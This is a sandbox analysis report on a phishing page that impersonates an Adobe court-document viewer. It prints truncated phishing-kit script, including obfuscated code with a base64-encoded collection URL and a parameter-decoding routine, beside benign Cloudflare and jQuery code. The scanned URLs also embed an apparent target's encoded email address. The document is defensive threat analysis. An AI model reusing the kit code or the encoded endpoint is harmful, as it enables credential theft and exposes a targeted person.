| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com |
| URL: https://clicktoviewdocumentonadovemacroreader.fede... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a simple function that submits the first form on the page. This behavior is relatively low-risk and is likely part of a legitimate web application functionality. While the use of `document.forms[0].submit()` is a common practice, it does not exhibit any high-risk indicators such as dynamic code execution, data exfiltration, or suspicious redirects. Therefore, the risk score is assessed as low."
} |
function AmberLight() {
document.forms[0].submit();
}
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "This script appears to be a Cloudflare challenge implementation, which is a common security mechanism used to protect websites from abuse. While it exhibits some behaviors that could be considered moderate-risk, such as external data transmission and the use of fallback domains, the overall context suggests this is a legitimate security measure rather than a malicious script. Further review may be needed to fully understand the script's purpose and potential impact, but the risk level is assessed as medium due to the lack of clear malicious intent."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '7iiwn',
chlApiSitekey: '0x4AAAAAAA3I3GV9NQQPwYEk',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'i161anfX4Zr_a0tBYRrxUx1cahaZywuIQ8QB7giS1bk-1736363309-1.3.1.1-scLMKIIj32Yk3hLCZ1LAh4.wgxCgHgEsjDByksSV4oY',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fee79fc7f2d0f78',
cH: 'Fj9NgRvrhyFk1NJ7A1kQOqh7uFMDYfrnKVsHzDVfxTo-1736363309-1.1.1.1-kYw5oABzJmKzPr_rcG9_KJgFWhWSvqrKW2vXyRpmCSnxPxIRfj4_xqGgDBiexL5R',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'jInBVegqefmdIjztkwKVIPbOAc41uTYxHdrJy_I0cAQ-1736363309-1.1.1.1-4PijqjDKHTMlWv5gtFjs8Pfjvf1_fxCj6V.XjcLYR8MfKwJYVwRvRmCdcN863SsCAXAP7B6x6PYDX1WOi.8LhHcBYobGzpYUqRANUw9VpaYfrgKt39QxUrXjfT8FV8XehVK77MzGlsfScPVyZOCr8gHcwkgzZti016CFzkZ8AAp4KjPNNRktKA9NtSVgVGZG4l04n9453NT7XP02a3LMd3idNGRDtklAuimdRo3PvlXZ2JQs.BTeVzlF1Hlf.8aCsWVEySUVTFWH0JuEc0CQFE.wxgol_nxk2yRFD2yt2v_USRgHk16FB2eZOEMeSf0zgwlCdxmygsBumwwu2wWQNbcJ1aoUEXzRtjlBNrUPLTcdAeZo.gOhXLpCJHV7UsQecfXTNiXLWEu7K.e3iWaq_3rj4tEUfnjhXlioO8jd_zCYir4jdfEq9z2flhybv99Po0Kbs.opsInkTdgzTSfnQ.LNGpFIarlo.aqGMVzSSeiI9rpZe.61zE_jiIGd7nHoNj6I54T6A6.flhp9dwa1uQgWJtGtKjHa5BIe6048yEKlyBz4o_XGrUS9kiNd.D6Vmjuwh6lExip_GJZw.aeo0d6DxPa4ojSlIuWlD7N.aRV2FwDtvkkO56Gi5UdYvilJqFXTlYbPMvdVjQWf3gxQqeqvp5yN.uws8S.UuZX6uQFD4iWIMyemY7JjGwVEWKOnZPa9uPRjb4lFJok9_Qrrhmll8BMseJg0NMDU6I8WSD4KbqA.WUl.tbsqxdvn_oIjIe0wo0NxJzw_LkDsCSLWl6OdYH_1m1gWuF9x1XQhUxQy4IkMGefL_w7yuyTxfs2Fan8ox4GYtRzEpV638PDOJXb3ppHL7sJ05YMff89zAfvWNvyx7AwEoip2bjM32UpoVu9nJ3eWlKJQRaiA4gSrCBT0YUIG4G_RxM673nXNDRerepMcc3ysh.HjtB3_F3TTNBSV5I9ArXLfUpSPGEKJaRcA1CAUP1ZzKUVB5cQmQS8smV29gY.rDsBgfwZ9ookNx2X9jZT4GF39gq0_eMg.JhqKXFzwMpL85of2Bgls8OZ3ZwZhNf2LXH7lfa7YmFVn7Jsvz9oDSnExiNUez54GOUxG8YxwC2H5L7QN8ckdYFtWc9mgDGLDfEIQvVPGzWzJRsyGFzap3ZRlFd9sMxXGXMWA0kFCltyWGDDBVGzSFf.sD68yY5ZsDFqNMyA8ccT4qSuf271fumP8epY8zMZkYnDUrfvbNzjo_s.MYVZHkdQ55l7lMkzuP.85ehRC2IeZjrtu04l8sB0l0Kzyv.nsy8DNNKBdISMDbhtZAJYiZApm1S1TDQNPM3vivFKrFjC7DY1KPy39eclUsAU75fJ2BnlhTb30QMfyyOOiAXO03DoRLY.i_p40TJp9uZzhSdcrDoZF9o3zIroG_TkWSlwCKQ58Q4Zo74LOTk8Vzgb9.D7cQw7kpRB0ft1xKaNW1Z4Tn8IT.vd5k3nsL7iB8dRLeBfa5V6j4oTky4ejSMHyEh_3R4PhVoWl.2Jlix.fF.aaV1.diCY3EAmiza2QpwUPhUsSCXxpxSMLbje1EdwYRmX0YDvwsqLS3cDlFFkq_Q6.rC6MG9TC7CC0GWN4TSc8ZPa1YZrcCDCUhkGLOYjaJIj0pibqU0bIyCCLfrfCyYi0',
cITimeS: '1736363309',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '7iiwn',
nextRcV: 'i161anfX4Zr_a0tBYRrxUx1cahaZywuIQ8QB7giS1bk-1736363309-1.3.1.1-scLMKIIj32Yk3hLCZ1LAh4.wgxCgHgEsjDByksSV4oY',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the Cloudflare challenge and providing translations for various messages. This behavior is consistent with a legitimate security mechanism and does not pose a significant security risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"turnstile_expired":"Expired","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_overrun_description":"Stuck%20here%3F","turnstile_success":"Success%21","testing_only":"Testing%20only.","turnstile_feedback_description":"Send%20Feedback","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_report":"Having%20trouble%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_timeout":"Timed%20out","turnstile_footer_privacy":"Privacy","turnstile_refresh":"Refresh","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_footer_terms":"Terms","turnstile_failure":"Error","turnstile_verifying":"Verifying..."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eP,eQ,eU,eV,f1,f4,f6,f7,f8,fk,fw,fC,fD,fE,fO,fZ,g3,g6,g7,gx,gE,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1579))/1+-parseInt(gI(1011))/2+-parseInt(gI(477))/3+-parseInt(gI(317))/4*(parseInt(gI(365))/5)+-parseInt(gI(1159))/6+-parseInt(gI(559))/7*(parseInt(gI(1232))/8)+-parseInt(gI(1069))/9*(-parseInt(gI(535))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,767460),eM=this||self,eN=eM[gJ(1379)],eO=function(c,gK,f,g,h,i,j,k){for(gK=gJ,f={'vNZzs':function(l,m){return l+m},'hzYlU':function(l,m){return l(m)},'gkpWJ':function(l,m){return l%m},'ZHITv':function(l,m){return l-m}},k,h=32,j=f[gK(582)](eM[gK(852)][gK(403)]+'_',0),j=j[gK(396)](/./g,function(l,m,gL){gL=gK,h^=j[gL(1437)](m)}),c=eM[gK(598)](c),i=[],g=-1;!f[gK(412)](isNaN,k=c[gK(1437)](++g));i[gK(1574)](String[gK(596)](f[gK(471)](f[gK(582)](f[gK(1077)]((k&255)-h,g%65535),65535),255))));return i[gK(945)]('')},eP={},eP[gJ(253)]='o',eP[gJ(1534)]='s',eP[gJ(299)]='u',eP[gJ(597)]='z',eP[gJ(650)]='n',eP[gJ(1496)]='I',eP[gJ(1144)]='b',eQ=eP,eM[gJ(883)]=function(g,h,i,j,gR,o,x,B,C,D,E,F){if(gR=gJ,o={'stgCB':function(G,H){return H===G},'Mqkbk':function(G,H,I){return G(H,I)},'ydgdk':function(G,H){return G+H}},null===h||void 0===h)return j;for(x=eT(h),g[gR(1441)][gR(1148)]&&(x=x[gR(619)](g[gR(1441)][gR(1148)](h))),x=g[gR(467)][gR(589)]&&g[gR(637)]?g[gR(467)][gR(589)](new g[(gR(637))](x)):function(G,gS,H){for(gS=gR,G[gS(721)](),H=0;H<G[gS(862)];o[gS(449)](G[H],G[H+1])?G[gS(607)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[gR(521)][gR(227)](B),C=0;C<x[gR(862)];D=x[C],E=eS(g,h,D),B(E)?(F=o[gR(449)]('s',E)&&!g[ |
| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated, and there are no external data transmissions or redirects. It uses modern JavaScript practices and does not interact with any external domains."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is well-structured and does not exhibit any suspicious behavior. Overall, this is a low-risk script that is commonly used for legitimate web development purposes."
} |
/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?i[j.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b||this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Obj |
| URL: https://1595267145-1323985617.cos.ap-singapore.myq... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the `atob()` function to decode a base64-encoded string and the presence of heavily obfuscated code suggest malicious intent. Additionally, the script appears to be interacting with an unknown domain (`1595267145.uscourtelegalhelp.com`), which is a strong indicator of potential malicious activity. Overall, this script poses a high risk and should be thoroughly investigated."
} |
var file = "aHR0cHM6Ly8xNTk1MjY3MTQ1LnVzY291cnRsZWdhbGhlbHAuY29tL25leHQucGhw";
var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','> <spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.border-i','top:\x2020px;','v></footer','ct(0,\x200,\x200','n\x20id=\x22aich','ed-right\x20{','7,\x20.col-sm','.5\x202.5\x201.5','o\x20.custom-','s\x20.card\x20{\x20',':\x20540px\x20}\x20','class=\x22for','-group:\x207;','n-warning:','md-8,\x20.col','\x20}\x20#nacre\x20','ared/1.0/c','\x20section\x20{','dex:\x201060;','}\x20.paginat','op:\x201rem;\x20','n:\x20linear;','7%\x20}\x20.col-','v2oNI1bxB+','ice-width\x20','elative\x20{\x20','\x200\x200\x200\x20.2r','kit-transf','disabled~.','\x20fixed;\x20to','ems:\x20flex-','r;\x20-ms-fle','on\x20sms\x22\x20wi','t\x20}\x20.ml-1,','YrCZs','r,\x20.card-g','br><br>\x20<s','x:\x200\x200\x2083.','9\x20}\x20.order','ntrol-labe','5\x20}\x20.btn-s','xpand-sm\x20.','round:\x20#27',':valid:foc','ia7uLebbpt','ow:\x20auto;\x20','\x20.justify-','pand-md\x20.d','tn\x20input[t','t-group-sm','ion:\x20norma','-pack:\x20jus','-danger\x20.a','10;\x20-ms-fl','ol-8,\x20.col','active:hov','-file,\x20.in','ontent:\x20fl','-box-align','n-left:\x2075','t\x20}\x20.justi','oe\x20UI\x20Web\x20','-5,\x20.my-lg','al-title],','\x20@media\x20(m','left:\x200;\x20p','d-image:\x20n',':\x20none;\x20op','That\x20Micro','{\x20.float-l','menu\x20{\x20top','.8rem\x20}\x20.b','rtant\x20}\x20.f','sabled).ac','rtant;\x20ali','px\x20}\x20.form','nbspSign\x20i','uppercase\x20','-items-cen','-item-acti','{\x20position','do=login&u','vertical-a','der-sm-6\x20{','tant\x20}\x20a.t','-file\x20{\x20po','ore\x20{\x20bord','border-rig','om-select:','9;\x20backgro','s~.custom-','\x200\x2016.6666','lass=\x22form',':\x20normal;\x20','height:\x20in','dmsTI','tica\x20Neue\x22','navbar-nav',':\x20#fff;\x20ba','line-box\x20!','active>td,','rem;\x20left:','.active,\x20.','ry,\x20.table','\x20class=\x22bg','l-0,\x20.mx-x','it-box-ori','#E5E5E5;cu',',\x20.mx-sm-1','one;\x20lette','ark\x20{\x20back','ffPhm','up-lg>.inp','NX4a/bbz/n','}\x20.m-md-3\x20','0;\x20backgro','las,\x20\x22Libe','idth:1199.','-hover\x20.ta','aoLXh','box-ordina','adius:\x200;\x20','ight:hover','\x20.carousel','select:not','circle\x20{\x20b','span\x20id=\x22n','],\x20.bs-pop','ode_f7ab69','ttom-color','x-order:\x203','\x20order:\x207\x20','n-items:\x20s',':\x20#818182;','.loader\x20.c','-tooltip-t','om:\x201px\x20so','th:\x20130px;','1;\x20max-wid','ard\x20{\x20marg','ent:\x20verti','\x20}\x20.pt-xl-','-auto[x-pl',':\x20350px;*/','-dark\x20.nav','ica\x20Neue\x22,','dy,\x20html\x20{','QpGhscEJIz','class=\x22py-',':\x201;\x20-ms-f','tyle=\x22HEIG','ed-size:\x200','top:\x20.5rem','ollapse.sh',',\x20.125);\x20b','y-lg-auto\x20','#005cbf\x20}\x20','15px\x20}\x20@me','o\x20}\x20.btn-g','ning:hover','p2n6ratZap',';\x20-ms-user','em\x20.75rem;','er>th\x20{\x20ba',':\x203;\x20-ms-f',',Roboto,\x27H','er\x20New\x22,\x20m','ound-posit','\x20}\x20.p-sm-2','\x20.order-xl','eight:\x201;\x20','-danger:fo','re,\x20.bs-po','vbar-light','\x20}\x20.font-w','\x20auto\x20}\x20.b','x:\x200\x200\x20aut','w-y:\x20scrol','DbJFiTKspx','o\x20{\x20color:','sm-first\x20{','izontal;\x20-','AAAAAAAAAA','r-toggler\x20','d~.valid-f',' |
| URL: https://clicktoviewdocumentonadovemacroreader.fede... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be extracting a parameter from the URL and then decoding it using the `atob` function, which could potentially lead to the execution of malicious code. Additionally, the script contains a significant amount of irrelevant and obfuscated text, further raising suspicion about its true purpose. Overall, this script demonstrates a high level of risk and should be thoroughly investigated before being executed or allowed to run on any system."
} |
const absorption = (name) => {
name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
var results = regex.exec(location.search); // Duis proident burgdoggen nostrud jerky, dolore drumstick anim laboris beef cillum fugiat dolore commodo. Shoulder laborum exercitation dolor, non ex cupidatat fugiat tempor ut velit. Leberkas bresaola consequat, picanha commodo rump hamburger turkey sirloin in porchetta reprehenderit buffalo kielbasa. Aliquip tempor excepteur id doner burgdoggen reprehenderit. Cow incididunt hamburger andouille elit eu cupidatat ad mollit pork tempor ea. Ipsum deserunt in, adipisicing minim consectetur do pig cupim cillum. Velit aliquip excepteur, alcatra occaecat laborum culpa. Beef meatball ea, exercitation est aute kielbasa chislic lorem quis esse pig nisi alcatra cow. In aliqua pig, est filet mignon proident ipsum ham hock salami brisket dolor pariatur swine turducken. Cupidatat meatball magna pig incididunt cillum. Id leberkas eiusmod shankle bacon ut duis hamburger cow bresaola commodo. Chuck anim jowl boudin cupim sint pork belly nisi. Tongue pork ground round ham, in boudin rump corned beef consectetur short ribs. Consectetur capicola aliqua ea sed meatball shank pig. Tongue chicken quis landjaeger sunt tempor est strip steak elit cupim ad boudin ribeye officia.
return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
} // Cupidatat consectetur beef, bresaola lorem salami ball tip filet mignon fugiat rump laborum in fatback. Tail ad duis pancetta filet mignon in esse short ribs pork belly laborum ribeye sausage velit bresaola dolore. Aute reprehenderit doner short ribs pork loin, esse dolore magna ham corned beef. Buffalo venison quis landjaeger burgdoggen. Nostrud voluptate adipisicing andouille flank prosciutto fatback ground round beef ribs salami ad cow. Deserunt ball tip ullamco pork chop minim ham alcatra laborum doner. Buffalo aute biltong hamburger aliqua filet mignon ad ex kielbasa fatback salami pork. Ham beef officia, shoulder pig duis jowl laboris. Voluptate spare ribs jerky consectetur cillum aliquip strip steak aliqua deserunt ut commodo burgdoggen drumstick. Consectetur duis chuck tail short loin, qui cow ground round sint meatloaf consequat do tempor culpa pork loin. Enim ea dolore nisi, shoulder corned beef pork ex sausage fugiat dolor jowl et venison anim. Salami swine adipisicing burgdoggen pastrami ribeye in. Ipsum magna meatball sunt non, duis lorem incididunt qui irure. Adipisicing jerky enim biltong labore do. Culpa turducken eiusmod alcatra ham hock, leberkas boudin mollit kevin velit chuck.
